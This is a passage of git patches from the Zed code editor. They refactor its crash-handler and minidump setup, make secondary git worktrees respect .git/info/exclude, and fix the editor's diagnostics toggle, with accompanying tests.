connect the IPC client, and run the /// keepalive ping loop. Called on a background executor by [`init`]. 
-async fn connect_and_keepalive + Send + Sync + 'static>( +fn connect_and_keepalive( crash_init: InitCrashHandler, - handler: CrashHandler, - wait_timer: impl (Fn(Duration) -> F) + Send + Sync + 'static, -) { + socket_path: P, + wait_timer: C, + spawn: S, +) -> impl Future> + use +where + F: Future + Send + Sync + 'static, + C: (Fn(Duration) -> F) + Send + Sync + 'static, + S: FnOnce(Pin + Send + 'static>>), + P: FnOnce(u32) -> PathBuf, +{ let exe = env::current_exe().expect("unable to find ourselves"); - let zed_pid = process::id(); - let socket_name = paths::temp_dir().join(format!("zed-crash-handler-{zed_pid}")); - #[cfg(not(target_os = "windows"))] - let _crash_handler = Command::new(exe) - .arg("--crash-handler") - .arg(&socket_name) - .spawn() - .expect("unable to spawn server process"); - - #[cfg(target_os = "windows")] - spawn_crash_handler_windows(&exe, &socket_name); - + let socket_path = socket_path(process::id()); + let mut _crash_handler = spawn_crash_handler(&exe, &socket_path); info!("spawning crash handler process"); - send_crash_server_message(CrashServerMessage::Init(crash_init)); - - let mut elapsed = Duration::ZERO; - let retry_frequency = Duration::from_millis(100); - let mut maybe_client = None; - while maybe_client.is_none() { - if let Ok(client) = Client::with_name(SocketName::Path(&socket_name)) { - maybe_client = Some(client); - info!("connected to crash handler process after {elapsed:?}"); - break; - } - elapsed += retry_frequency; - wait_timer(retry_frequency).await; - } - let client = maybe_client.unwrap(); - let client = Arc::new(client); - - #[cfg(target_os = "linux")] - handler.set_ptracer(Some(_crash_handler.id())); - - // Publishing the client to the OnceLock makes it visible to the signal - // handler callback installed earlier. 
- CRASH_HANDLER.set(client.clone()).ok(); - let messages: Vec<_> = mem::take(PENDING_CRASH_SERVER_MESSAGES.lock().as_mut()); - for message in messages.into_iter() { - send_crash_server_message(message); - } - // mem::forget so that the drop is not called - mem::forget(handler); - info!("crash handler registered"); - - loop { - client.ping().ok(); - wait_timer(Duration::from_secs(10)).await; - } -} - -#[cfg(target_os = "macos")] -unsafe fn suspend_all_other_threads() { - let task = unsafe { mach2::traps::current_task() }; - let mut threads: mach2::mach_types::thread_act_array_t = std::ptr::null_mut(); - let mut count = 0; - unsafe { - mach2::task::task_threads(task, &raw mut threads, &raw mut count); - } - let current = unsafe { mach2::mach_init::mach_thread_self() }; - let panic_thread = PANIC_THREAD_ID.load(Ordering::SeqCst); - for i in 0..count { - let t = unsafe { *threads.add(i as usize) }; - if t != current && t != panic_thread { - unsafe { mach2::thread_act::thread_suspend(t) }; - } + async move { + let mut elapsed = Duration::ZERO; + let retry_frequency = Duration::from_millis(100); + let client = loop { + if let Ok(client) = Client::with_name(SocketName::Path(&socket_path)) { + info!("connected to crash handler process after {elapsed:?}"); + break client; + } + elapsed += retry_frequency; + wait_timer(retry_frequency).await; + }; + let client = Arc::new(client); + + panic::set_hook({ + let client = client.clone(); + Box::new(move |payload| { + panic_hook( + client.clone(), + payload.payload_as_str().unwrap_or("Box"), + payload.location(), + ) + }) + }); + info!("panic handler registered"); + let handler = CrashHandler::attach(unsafe { + let client = client.clone(); + let handler = move |crash_context: &crash_handler::CrashContext| { + // set when the first minidump request is made to avoid generating duplicate crash reports + static REQUESTED_MINIDUMP: AtomicBool = AtomicBool::new(false); + + // only request a minidump once + let res = if REQUESTED_MINIDUMP 
+ .compare_exchange(false, true, Ordering::Acquire, Ordering::Relaxed) + .is_ok() + { + #[cfg(target_os = "macos")] + macos::suspend_all_other_threads(); + + // on macos this "ping" is needed to ensure that all our + // `client.send_message` calls have been processed before we trigger the + // minidump request. + client.ping().ok(); + let r = client.request_dump(crash_context); + if let Err(e) = &r { + eprintln!("failed to request dump: {:?}", e); + } + #[cfg(target_os = "macos")] + macos::resume_all_other_threads(); + r.is_ok() + } else { + true + }; + CrashEventResult::Handled(res) + }; + crash_handler::make_crash_event(handler) + }) + .expect("failed to attach signal handler"); + + info!("crash signal handlers installed"); + send_crash_server_message(&client, CrashServerMessage::Init(crash_init)); + + #[cfg(target_os = "linux")] + handler.set_ptracer(Some(_crash_handler.id())); + + info!("crash handler registered"); + spawn(Box::pin({ + let client = client.clone(); + async move { + let _handler = { handler }; + loop { + if let Err(e) = client.ping() { + #[cfg(not(target_os = "windows"))] + log::error!( + "ping failed: {:?}, process exit status: {:?}", + e, + _crash_handler.try_status() + ); + #[cfg(target_os = "windows")] + log::error!("ping failed: {:?}", e,); + break; + }; + wait_timer(Duration::from_secs(10)).await; + } + } + })); + client } } @@ -193,6 +172,7 @@ pub struct CrashServer { active_gpu: Mutex>, user_info: Mutex>, has_connection: Arc, + logs_dir: PathBuf, } #[derive(Debug, Deserialize, Serialize, Clone)] @@ -226,11 +206,7 @@ pub struct UserInfo { pub is_staff: Option, } -fn send_crash_server_message(message: CrashServerMessage) { - let Some(crash_server) = CRASH_HANDLER.get() else { - PENDING_CRASH_SERVER_MESSAGES.lock().push(message); - return; - }; +fn send_crash_server_message(crash_client: &Arc, message: CrashServerMessage) { let data = match serde_json::to_vec(&message) { Ok(data) => data, Err(err) => { @@ -239,17 +215,17 @@ fn 
send_crash_server_message(message: CrashServerMessage) { } }; - if let Err(err) = crash_server.send_message(0, data) { + if let Err(err) = crash_client.send_message(0, data) { log::warn!("Failed to send data to crash server {:?}", err); } } -pub fn set_gpu_info(specs: GpuSpecs) { - send_crash_server_message(CrashServerMessage::GPUInfo(specs)); +pub fn set_gpu_info(crash_client: &Arc, specs: GpuSpecs) { + send_crash_server_message(crash_client, CrashServerMessage::GPUInfo(specs)); } -pub fn set_user_info(info: UserInfo) { - send_crash_server_message(CrashServerMessage::UserInfo(info)); +pub fn set_user_info(crash_client: &Arc, info: UserInfo) { + send_crash_server_message(crash_client, CrashServerMessage::UserInfo(info)); } #[derive(Serialize, Deserialize, Debug)] @@ -262,7 +238,8 @@ enum CrashServerMessage { impl minidumper::ServerHandler for CrashServer { fn create_minidump_file(&self) -> Result<(File, PathBuf), io::Error> { - let dump_path = paths::logs_dir() + let dump_path = self + .logs_dir .join( &self .initialization_params @@ -318,7 +295,8 @@ impl minidumper::ServerHandler for CrashServer { user_info: self.user_info.lock().clone(), }; - let crash_data_path = paths::logs_dir() + let crash_data_path = self + .logs_dir .join(&crash_info.init.session_id) .with_extension("json"); @@ -382,52 +360,92 @@ fn strip_user_string_from_panic(message: &str) -> String { message.to_owned() } -pub fn panic_hook(info: &PanicHookInfo) { - let message = strip_user_string_from_panic(info.payload_as_str().unwrap_or("Box")); +pub fn panic_hook(crash_client: Arc, message: &str, location: Option<&Location>) { + let message = strip_user_string_from_panic(message); - let span = info - .location() + let span = location .map(|loc| format!("{}:{}", loc.file(), loc.line())) .unwrap_or_default(); let current_thread = std::thread::current(); let thread_name = current_thread.name().unwrap_or(""); - // wait 500ms for the crash handler process to start up - // if it's still not there just 
write panic info and no minidump - let retry_frequency = Duration::from_millis(100); - for _ in 0..5 { - if CRASH_HANDLER.get().is_some() { - break; - } - thread::sleep(retry_frequency); - } - let location = info - .location() - .map_or_else(|| "".to_owned(), |location| location.to_string()); + let location = location.map_or_else(|| "".to_owned(), |location| location.to_string()); log::error!("thread '{thread_name}' panicked at {location}:\n{message}..."); - send_crash_server_message(CrashServerMessage::Panic(CrashPanic { message, span })); + send_crash_server_message( + &crash_client, + CrashServerMessage::Panic(CrashPanic { message, span }), + ); log::error!("triggering a crash to generate a minidump..."); #[cfg(target_os = "macos")] - PANIC_THREAD_ID.store( - unsafe { mach2::mach_init::mach_thread_self() }, - Ordering::SeqCst, - ); + macos::set_panic_thread_id(); + #[cfg(target_os = "windows")] + { + // https://learn.microsoft.com/en-us/windows/win32/debug/system-error-codes--0-499- + CrashHandler.simulate_exception(Some(234)); // (MORE_DATA_AVAILABLE) + } + #[cfg(not(target_os = "windows"))] + { + std::process::abort(); + } +} + +#[cfg(target_os = "macos")] +mod macos { + static PANIC_THREAD_ID: std::sync::atomic::AtomicU32 = std::sync::atomic::AtomicU32::new(0); + + pub(super) fn set_panic_thread_id() { + PANIC_THREAD_ID.store( + unsafe { mach2::mach_init::mach_thread_self() }, + std::sync::atomic::Ordering::Release, + ); + } - cfg_if::cfg_if! 
{ - if #[cfg(target_os = "windows")] { - // https://learn.microsoft.com/en-us/windows/win32/debug/system-error-codes--0-499- - CrashHandler.simulate_exception(Some(234)); // (MORE_DATA_AVAILABLE) - } else { - std::process::abort(); + pub(super) unsafe fn suspend_all_other_threads() { + let task = unsafe { mach2::traps::current_task() }; + let mut threads: mach2::mach_types::thread_act_array_t = std::ptr::null_mut(); + let mut count = 0; + unsafe { + mach2::task::task_threads(task, &raw mut threads, &raw mut count); + } + let current = unsafe { mach2::mach_init::mach_thread_self() }; + for i in 0..count { + let t = unsafe { *threads.add(i as usize) }; + if t != current { + unsafe { mach2::thread_act::thread_suspend(t) }; + } } } + + pub(super) unsafe fn resume_all_other_threads() { + let task = unsafe { mach2::traps::current_task() }; + let mut threads: mach2::mach_types::thread_act_array_t = std::ptr::null_mut(); + let mut count = 0; + unsafe { + mach2::task::task_threads(task, &raw mut threads, &raw mut count); + } + let current = unsafe { mach2::mach_init::mach_thread_self() }; + for i in 0..count { + let t = unsafe { *threads.add(i as usize) }; + if t != current { + unsafe { mach2::thread_act::thread_resume(t) }; + } + } + } +} +#[cfg(not(target_os = "windows"))] +fn spawn_crash_handler(exe: &Path, socket_name: &Path) -> async_process::Child { + async_process::Command::new(exe) + .arg("--crash-handler") + .arg(&socket_name) + .spawn() + .expect("unable to spawn server process") } #[cfg(target_os = "windows")] -fn spawn_crash_handler_windows(exe: &Path, socket_name: &Path) { +fn spawn_crash_handler(exe: &Path, socket_name: &Path) { use std::ffi::OsStr; use std::iter::once; use std::os::windows::ffi::OsStrExt; @@ -477,7 +495,7 @@ fn spawn_crash_handler_windows(exe: &Path, socket_name: &Path) { } } -pub fn crash_server(socket: &Path) { +pub fn crash_server(socket: &Path, logs_dir: PathBuf) { let Ok(mut server) = Server::with_name(SocketName::Path(socket)) else { 
log::info!("Couldn't create socket, there may already be a running crash server"); return; @@ -508,6 +526,7 @@ pub fn crash_server(socket: &Path) { user_info: Mutex::default(), has_connection, active_gpu: Mutex::default(), + logs_dir, }), &shutdown, Some(CRASH_HANDLER_PING_TIMEOUT), diff --git a/crates/feedback/Cargo.toml b/crates/feedback/Cargo.toml index 6a595bf4ee4645..981fc4ea41c4bb 100644 --- a/crates/feedback/Cargo.toml +++ b/crates/feedback/Cargo.toml @@ -22,4 +22,4 @@ urlencoding.workspace = true util.workspace = true workspace.workspace = true zed_actions.workspace = true - +client.workspace = true diff --git a/crates/feedback/src/feedback.rs b/crates/feedback/src/feedback.rs index 4a9f92d6d26b68..16c91ce769dff9 100644 --- a/crates/feedback/src/feedback.rs +++ b/crates/feedback/src/feedback.rs @@ -1,3 +1,4 @@ +use client::telemetry; use extension_host::ExtensionStore; use gpui::{App, ClipboardItem, PromptLevel, actions}; use system_specs::{CopySystemSpecsIntoClipboard, SystemSpecs}; @@ -48,7 +49,8 @@ pub fn init(cx: &mut App) { cx.observe_new(|workspace: &mut Workspace, _, _| { workspace .register_action(|_, _: &CopySystemSpecsIntoClipboard, window, cx| { - let specs = SystemSpecs::new(window, cx); + let specs = + SystemSpecs::new(window, cx, telemetry::os_name(), telemetry::os_version()); cx.spawn_in(window, async move |_, cx| { let specs = specs.await.to_string(); @@ -83,7 +85,8 @@ pub fn init(cx: &mut App) { cx.open_url(REQUEST_FEATURE_URL); }) .register_action(move |_, _: &FileBugReport, window, cx| { - let specs = SystemSpecs::new(window, cx); + let specs = + SystemSpecs::new(window, cx, telemetry::os_name(), telemetry::os_version()); cx.spawn_in(window, async move |_, cx| { let specs = specs.await; cx.update(|_, cx| { @@ -94,7 +97,8 @@ pub fn init(cx: &mut App) { .detach(); }) .register_action(move |_, _: &EmailZed, window, cx| { - let specs = SystemSpecs::new(window, cx); + let specs = + SystemSpecs::new(window, cx, telemetry::os_name(), 
telemetry::os_version()); cx.spawn_in(window, async move |_, cx| { let specs = specs.await; cx.update(|_, cx| { diff --git a/crates/remote_server/src/main.rs b/crates/remote_server/src/main.rs index 66ffcc1631786a..5f0033f1a0aa65 100644 --- a/crates/remote_server/src/main.rs +++ b/crates/remote_server/src/main.rs @@ -30,7 +30,7 @@ fn main() -> anyhow::Result<()> { } if let Some(socket) = &cli.crash_handler { - crashes::crash_server(socket.as_path()); + crashes::crash_server(socket.as_path(), paths::logs_dir().clone()); return Ok(()); } diff --git a/crates/remote_server/src/server.rs b/crates/remote_server/src/server.rs index c0a6d6de1993b4..ec2b1963b9df96 100644 --- a/crates/remote_server/src/server.rs +++ b/crates/remote_server/src/server.rs @@ -462,21 +462,35 @@ pub fn execute_run( let app = gpui_platform::headless(); let pid = std::process::id(); let id = pid.to_string(); - crashes::init( - crashes::InitCrashHandler { - session_id: id, - zed_version: VERSION.to_owned(), - binary: "zed-remote-server".to_string(), - release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), - commit_sha: option_env!("ZED_COMMIT_SHA").unwrap_or("no_sha").to_owned(), - }, - |task| { - app.background_executor().spawn(task).detach(); - }, - // we are running outside gpui - #[allow(clippy::disallowed_methods)] - |duration| FutureExt::map(Timer::after(duration), |_| ()), - ); + let should_install_crash_handler = matches!( + env::var("ZED_GENERATE_MINIDUMPS").as_deref(), + Ok("true" | "1") + ) || *RELEASE_CHANNEL != ReleaseChannel::Dev; + + let crash_handler = if should_install_crash_handler { + Some(app.background_executor().spawn(crashes::init( + crashes::InitCrashHandler { + session_id: id, + zed_version: VERSION.to_owned(), + binary: "zed-remote-server".to_string(), + release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), + commit_sha: option_env!("ZED_COMMIT_SHA").unwrap_or("no_sha").to_owned(), + }, + { + let background_executor = app.background_executor(); + move 
|task| { + background_executor.spawn(task).detach(); + } + }, + |pid| paths::temp_dir().join(format!("zed-remote-server-crash-handler-{pid}")), + // we are running outside gpui + #[allow(clippy::disallowed_methods)] + |duration| FutureExt::map(Timer::after(duration), |_| ()), + ))) + } else { + crashes::force_backtrace(); + None + }; let log_rx = init_logging_server(&log_file)?; log::info!( "starting up with PID {}:\npid_file: {:?}, log_file: {:?}, stdin_socket: {:?}, stdout_socket: {:?}, stderr_socket: {:?}", @@ -515,7 +529,14 @@ pub fn execute_run( let shell_env_loaded_rx: Option> = None; let git_hosting_provider_registry = Arc::new(GitHostingProviderRegistry::new()); - let run = move |cx: &mut _| { + let run = move |cx: &mut App| { + if let Some(crash_handler) = crash_handler { + cx.spawn(async move |_cx| { + let _crash_handler = crash_handler.await; + // cx.update(|cx| cx.set_global(CrashHandler(crash_handler))) + }) + .detach(); + } settings::init(cx); let app_commit_sha = option_env!("ZED_COMMIT_SHA").map(|s| AppCommitSha::new(s.to_owned())); let app_version = AppVersion::load( @@ -720,22 +741,30 @@ pub(crate) fn execute_proxy( let server_paths = ServerPaths::new(&identifier)?; let id = std::process::id().to_string(); - crashes::init( - crashes::InitCrashHandler { - session_id: id, - zed_version: VERSION.to_owned(), - binary: "zed-remote-server".to_string(), - release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), - commit_sha: option_env!("ZED_COMMIT_SHA").unwrap_or("no_sha").to_owned(), - }, - |task| { - smol::spawn(task).detach(); - }, - // we are running outside gpui - #[allow(clippy::disallowed_methods)] - |duration| FutureExt::map(Timer::after(duration), |_| ()), - ); - + let should_install_crash_handler = matches!( + env::var("ZED_GENERATE_MINIDUMPS").as_deref(), + Ok("true" | "1") + ) || *RELEASE_CHANNEL != ReleaseChannel::Dev; + + if should_install_crash_handler { + smol::spawn(crashes::init( + crashes::InitCrashHandler { + session_id: id, + 
zed_version: VERSION.to_owned(), + binary: "zed-remote-proxy".to_string(), + release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), + commit_sha: option_env!("ZED_COMMIT_SHA").unwrap_or("no_sha").to_owned(), + }, + |task| { + smol::spawn(task).detach(); + }, + |pid| paths::temp_dir().join(format!("zed-remote-server-proxy-crash-handler-{pid}")), + // we are running outside gpui + #[allow(clippy::disallowed_methods)] + |duration| FutureExt::map(Timer::after(duration), |_| ()), + )) + .detach(); + }; log::info!("starting proxy process. PID: {}", std::process::id()); let server_pid = { let server_pid = check_pid_file(&server_paths.pid_file).map_err(|source| { diff --git a/crates/system_specs/Cargo.toml b/crates/system_specs/Cargo.toml index 15d6822b387024..7af62d934affff 100644 --- a/crates/system_specs/Cargo.toml +++ b/crates/system_specs/Cargo.toml @@ -16,7 +16,6 @@ default = [] [dependencies] anyhow.workspace = true -client.workspace = true gpui.workspace = true human_bytes.workspace = true release_channel.workspace = true diff --git a/crates/system_specs/src/system_specs.rs b/crates/system_specs/src/system_specs.rs index 139f23d19373cf..2c7a169ef01923 100644 --- a/crates/system_specs/src/system_specs.rs +++ b/crates/system_specs/src/system_specs.rs @@ -1,4 +1,3 @@ -use client::telemetry; pub use gpui::GpuSpecs; use gpui::{App, AppContext as _, Task, Window, actions}; use human_bytes::human_bytes; @@ -30,10 +29,14 @@ pub struct SystemSpecs { } impl SystemSpecs { - pub fn new(window: &mut Window, cx: &mut App) -> Task { + pub fn new( + window: &mut Window, + cx: &mut App, + os_name: String, + os_version: String, + ) -> Task { let app_version = AppVersion::global(cx).to_string(); let release_channel = ReleaseChannel::global(cx); - let os_name = telemetry::os_name(); let system = System::new_with_specifics( RefreshKind::nothing().with_memory(MemoryRefreshKind::everything()), ); @@ -55,7 +58,6 @@ impl SystemSpecs { }); cx.background_spawn(async move { - let 
os_version = telemetry::os_version(); SystemSpecs { app_version, release_channel: release_channel.display_name(), @@ -74,9 +76,9 @@ impl SystemSpecs { app_version: Version, app_commit_sha: Option, release_channel: ReleaseChannel, + os_name: String, + os_version: String, ) -> Self { - let os_name = telemetry::os_name(); - let os_version = telemetry::os_version(); let system = System::new_with_specifics( RefreshKind::nothing().with_memory(MemoryRefreshKind::everything()), ); diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index 9141fe1aa8ae31..f8023224a3365a 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -23,6 +23,7 @@ use git::GitHostingProviderRegistry; use git_ui::clone::clone_and_open; use gpui::{ App, AppContext, Application, AsyncApp, Focusable as _, QuitMode, Task, UpdateGlobal as _, + block_on, }; use gpui_platform; @@ -43,6 +44,7 @@ use recent_projects::{RemoteSettings, open_remote_project}; use release_channel::{AppCommitSha, AppVersion, ReleaseChannel}; use session::{AppSession, Session}; use settings::{BaseKeymap, Settings, SettingsStore, watch_config_file}; +use smol::future::poll_once; use std::{ cell::RefCell, env, @@ -67,7 +69,7 @@ use zed::{ handle_keymap_file_changes, initialize_workspace, open_paths_with_positions, }; -use crate::zed::{OpenRequestKind, eager_load_active_theme_and_icon_theme}; +use crate::zed::{CrashHandler, OpenRequestKind, eager_load_active_theme_and_icon_theme}; #[cfg(feature = "mimalloc")] #[global_allocator] @@ -195,7 +197,7 @@ fn main() { // `zed --crash-handler` Makes zed operate in minidump crash handler mode if let Some(socket) = &args.crash_handler { - crashes::crash_server(socket.as_path()); + crashes::crash_server(socket.as_path(), paths::logs_dir().clone()); return; } @@ -299,6 +301,8 @@ fn main() { app_version, app_commit_sha, *release_channel::RELEASE_CHANNEL, + client::telemetry::os_name(), + client::telemetry::os_version(), ); println!("Zed System Specs (from CLI):\n{}", 
system_specs); return; @@ -338,28 +342,6 @@ fn main() { KeyValueStore::from_app_db(&app_db), )); let background_executor = app.background_executor(); - crashes::init( - InitCrashHandler { - session_id, - // strip the build and channel information from the version string, we send them separately - zed_version: semver::Version::new( - app_version.major, - app_version.minor, - app_version.patch, - ) - .to_string(), - binary: "zed".to_string(), - release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), - commit_sha: app_commit_sha - .as_ref() - .map(|sha| sha.full()) - .unwrap_or_else(|| "no sha".to_owned()), - }, - |task| { - app.background_executor().spawn(task).detach(); - }, - move |duration| background_executor.timer(duration), - ); let (open_listener, mut open_rx) = OpenListener::new(); @@ -389,6 +371,46 @@ fn main() { return; } + let should_install_crash_handler = matches!( + env::var("ZED_GENERATE_MINIDUMPS").as_deref(), + Ok("true" | "1") + ) || *release_channel::RELEASE_CHANNEL + != ReleaseChannel::Dev; + + let crash_handler = if should_install_crash_handler { + Some( + app.background_executor().spawn(crashes::init( + InitCrashHandler { + session_id, + // strip the build and channel information from the version string, we send them separately + zed_version: semver::Version::new( + app_version.major, + app_version.minor, + app_version.patch, + ) + .to_string(), + binary: "zed".to_string(), + release_channel: release_channel::RELEASE_CHANNEL_NAME.clone(), + commit_sha: app_commit_sha + .as_ref() + .map(|sha| sha.full()) + .unwrap_or_else(|| "no sha".to_owned()), + }, + { + let background_executor1 = app.background_executor(); + move |task| { + background_executor1.spawn(task).detach(); + } + }, + |pid| paths::temp_dir().join(format!("zed-crash-handler-{pid}")), + move |duration| background_executor.timer(duration), + )), + ) + } else { + crashes::force_backtrace(); + None + }; + let git_hosting_provider_registry = 
Arc::new(GitHostingProviderRegistry::new()); let git_binary_path = if cfg!(target_os = "macos") && option_env!("ZED_BUNDLE").as_deref() == Some("true") { @@ -417,7 +439,7 @@ fn main() { util::load_login_shell_environment().await.log_err(); shell_env_loaded_tx.send(()).ok(); }) - .detach() + .detach(); } else { drop(shell_env_loaded_tx) } @@ -573,12 +595,17 @@ fn main() { ); cx.subscribe(&user_store, { let telemetry = telemetry.clone(); - move |_, evt: &client::user::Event, _| match evt { + move |_, evt: &client::user::Event, cx| match evt { client::user::Event::PrivateUserInfoUpdated => { - crashes::set_user_info(crashes::UserInfo { - metrics_id: telemetry.metrics_id().map(|s| s.to_string()), - is_staff: telemetry.is_staff(), - }); + if let Some(crash_client) = cx.try_global::() { + crashes::set_user_info( + &crash_client.0, + crashes::UserInfo { + metrics_id: telemetry.metrics_id().map(|s| s.to_string()), + is_staff: telemetry.is_staff(), + }, + ); + } } _ => {} } @@ -810,6 +837,25 @@ fn main() { let menus = app_menus(cx); cx.set_menus(menus); + + if let Some(mut crash_handler) = crash_handler { + let crash_handler2 = block_on(poll_once(&mut crash_handler)); + match crash_handler2 { + Some(crash_handler) => { + cx.set_global(CrashHandler(crash_handler)); + } + None => { + cx.spawn(async move |cx| { + let client1 = crash_handler.await; + cx.update(|cx| { + cx.set_global(CrashHandler(client1)); + }); + }) + .detach(); + } + } + } + initialize_workspace(app_state.clone(), cx); cx.activate(true); diff --git a/crates/zed/src/zed.rs b/crates/zed/src/zed.rs index 6d1a9c176f1193..9461c89b7ad680 100644 --- a/crates/zed/src/zed.rs +++ b/crates/zed/src/zed.rs @@ -100,6 +100,10 @@ use zed_actions::{ OpenZedUrl, Quit, }; +pub struct CrashHandler(pub Arc); + +impl gpui::Global for CrashHandler {} + actions!( zed, [ @@ -515,7 +519,9 @@ pub fn initialize_workspace(app_state: Arc, cx: &mut App) { if let Some(specs) = window.gpu_specs() { log::info!("Using GPU: {:?}", specs); 
show_software_emulation_warning_if_needed(specs.clone(), window, cx); - crashes::set_gpu_info(specs); + if let Some(crash_client) = cx.try_global::() { + crashes::set_gpu_info(&crash_client.0, specs); + } } let edit_prediction_menu_handle = PopoverMenuHandle::default(); From 4c757218b90edf581a4a909d0d851424ff81f545 Mon Sep 17 00:00:00 2001 From: Fanteria Date: Mon, 4 May 2026 08:33:52 +0200 Subject: [PATCH 145/231] Respect .git/info/exclude in secondary worktrees (#51536) Closes #50880 When a git worktree linked via a `.git` file (e.g. `gitdir: /repo/.git/worktrees/my-worktree`) was opened in Zed, entries in `.git/info/exclude` were not respected. This is now fixed. Before you mark this PR as ready for review, make sure that you have: - [x] Added a solid test coverage and/or screenshots from doing manual testing - [x] Done a self-review taking into account security and performance aspects - [x] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) Release Notes: - Fixed `.git/info/exclude` not being respected when opening a secondary git worktree https://github.com/user-attachments/assets/f38df5dc-96eb-40a8-a77c-0932a2c8575b --------- Co-authored-by: Lukas Wirth Co-authored-by: Lukas Wirth --- crates/worktree/src/worktree.rs | 4 +- crates/worktree/tests/integration/main.rs | 70 +++++++++++++++++++++++ 2 files changed, 73 insertions(+), 1 deletion(-) diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index c34f358bc84562..dc1f208fac7067 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -5568,7 +5568,9 @@ async fn discover_ancestor_git_repo( }; } - let repo_exclude_abs_path = ancestor_dot_git.join(REPO_EXCLUDE); + let dot_git_path: Arc = ancestor_dot_git.into(); + let (_, common_dir_abs_path) = discover_git_paths(&dot_git_path, fs.as_ref()).await; + let repo_exclude_abs_path = common_dir_abs_path.join(REPO_EXCLUDE); if let 
Ok(repo_exclude) = build_gitignore(&repo_exclude_abs_path, fs.as_ref()).await { exclude = Some(Arc::new(repo_exclude)); } diff --git a/crates/worktree/tests/integration/main.rs b/crates/worktree/tests/integration/main.rs index 2fedafc591f04f..7ea63f878cc7ca 100644 --- a/crates/worktree/tests/integration/main.rs +++ b/crates/worktree/tests/integration/main.rs @@ -2844,6 +2844,76 @@ async fn test_global_gitignore(executor: BackgroundExecutor, cx: &mut TestAppCon }); } +#[gpui::test] +async fn test_repo_exclude_in_worktree(executor: BackgroundExecutor, cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(executor); + + fs.insert_tree( + path!("/repo"), + json!({ + ".git": { + "info": { + "exclude": ".env.*" + }, + "worktrees": { + "my-worktree": { + "commondir": "../.." + } + } + } + }), + ) + .await; + + fs.insert_tree( + path!("/worktree"), + json!({ + // .git is pointing to the repo + ".git": "gitdir: /repo/.git/worktrees/my-worktree", + ".env.local": "secret=1234", + "not-ignored.txt": "", + }), + ) + .await; + + let worktree = Worktree::local( + path!("/worktree").as_ref(), + true, + fs.clone(), + Default::default(), + true, + WorktreeId::from_proto(0), + &mut cx.to_async(), + ) + .await + .unwrap(); + + worktree + .update(cx, |worktree, _| { + worktree.as_local().unwrap().scan_complete() + }) + .await; + cx.run_until_parked(); + + // .env.local should be ignored via info/exclude from the repo's exclude + worktree.update(cx, |worktree, _cx| { + let expected_excluded_paths = []; + let expected_ignored_paths = [".env.local"]; + let expected_tracked_paths = ["not-ignored.txt"]; + let expected_included_paths = []; + + check_worktree_entries( + worktree, + &expected_excluded_paths, + &expected_ignored_paths, + &expected_tracked_paths, + &expected_included_paths, + ); + }); +} + #[gpui::test] async fn test_repo_exclude(executor: BackgroundExecutor, cx: &mut TestAppContext) { init_test(cx); From 4fdc7025ec8111540ab914dddcb5f23d9dd762e9 Mon Sep 17 
00:00:00 2001 From: Om Chillure Date: Mon, 4 May 2026 12:07:50 +0530 Subject: [PATCH 146/231] Fix diagnostics in editor control enabling by itself (#52907) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ### Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments ← N/A, no unsafe blocks - [x] The content is consistent with the UI/UX checklist - [ ] Tests cover the new/changed behavior ← no existing tests; none added - [x] Performance impact has been considered and is acceptable #### Closes #52881 ### Fix Add a `diagnostics_manually_toggled: bool` field to `Editor`. It is set to `true` when the user toggles diagnostics off, and back to `false` when they toggle them on again. `settings_changed` now skips the severity override while this flag is set, preserving the user's intent across settings reloads. Video [Screencast from 2026-04-01 20-42-16.webm](https://github.com/user-attachments/assets/0e52868c-85bb-4270-b487-30bf50da97c2) Release Notes: - Fixed "Diagnostics" in Editor Controls re-enabling itself after being manually disabled --- crates/editor/src/editor.rs | 10 +++---- crates/editor/src/editor_tests.rs | 41 ++++++++++++++++++++++++++ crates/zed/src/zed/quick_action_bar.rs | 3 +- 3 files changed, 48 insertions(+), 6 deletions(-) diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index c625a3b97af1a3..dca22e31bffac8 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -20580,11 +20580,11 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - if !self.diagnostics_enabled() { - return; - } + let diagnostics_enabled = + self.diagnostics_enabled() && self.diagnostics_max_severity != DiagnosticSeverity::Off; + self.diagnostics_enabled = !diagnostics_enabled; - let new_severity = if self.diagnostics_max_severity == DiagnosticSeverity::Off { + let new_severity = if 
self.diagnostics_enabled { EditorSettings::get_global(cx) .diagnostics_max_severity .filter(|severity| severity != &DiagnosticSeverity::Off) @@ -20593,7 +20593,7 @@ impl Editor { DiagnosticSeverity::Off }; self.set_max_diagnostics_severity(new_severity, cx); - if self.diagnostics_max_severity == DiagnosticSeverity::Off { + if self.diagnostics_enabled { self.active_diagnostics = ActiveDiagnostic::None; self.inline_diagnostics_update = Task::ready(()); self.inline_diagnostics.clear(); diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index b0ea1b86740939..7f6ddf9dfa94a3 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -37367,3 +37367,44 @@ fn setup_syntax_highlighting_with_theme( ); }); } + +#[gpui::test] +async fn test_toggle_diagnostics_persists_across_settings_change(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + let mut cx = EditorTestContext::new(cx).await; + + cx.update_editor(|editor, _, _| { + assert!( + editor.diagnostics_enabled(), + "diagnostics should start enabled by default" + ); + }); + + cx.update_editor(|editor, window, cx| { + editor.toggle_diagnostics(&actions::ToggleDiagnostics, window, cx); + assert!( + !editor.diagnostics_enabled(), + "diagnostics should be disabled after toggle" + ); + }); + + update_test_editor_settings(&mut cx, &|settings| { + settings.cursor_blink = Some(false); + }); + 